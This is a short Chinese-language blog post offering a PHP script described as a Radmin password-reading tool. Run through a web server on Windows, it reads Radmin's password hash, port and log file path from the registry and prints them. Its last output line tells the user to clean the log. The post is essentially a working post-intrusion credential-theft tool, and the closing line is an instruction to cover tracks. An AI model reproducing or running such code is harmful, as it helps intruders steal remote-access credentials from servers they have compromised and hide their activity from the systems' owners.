Radmin密碼讀取工具(php版)

孤水繞城’s Blog


應小豬大鍋的要求寫的一個腳本。很垃圾但是還算有用吧。


<?php
$shell = new COM(“WScript.Shell”) or die(“This thing requires Windows Scripting Host”);
$rootkey = “HKEY_LOCAL_MACHINE\SYSTEMRAdmin\v2.0\Server\Parameters\”;
$Parameter = “Parameter”;
$Port = “Port”;
$logpath = “LogFilePath”;
$myparam = $shell->RegRead($rootkey.$Parameter);
$myport = $shell->RegRead($rootkey.$Port);
$path = $shell->RegRead($rootkey.$logpath);
echo “radmin hash is:”;
foreach($myparam as $a){
echo dechex($a);
}
echo “<br>”;
echo “radmin port is :”.hexdec(dechex($myport[1]).dechex($myport[0])).”<br>”;
echo “radmin log path is:$path<br>”;
echo “please clean the log”
?>

發佈留言

發佈留言必須填寫的電子郵件地址不會公開。 必填欄位標示為 *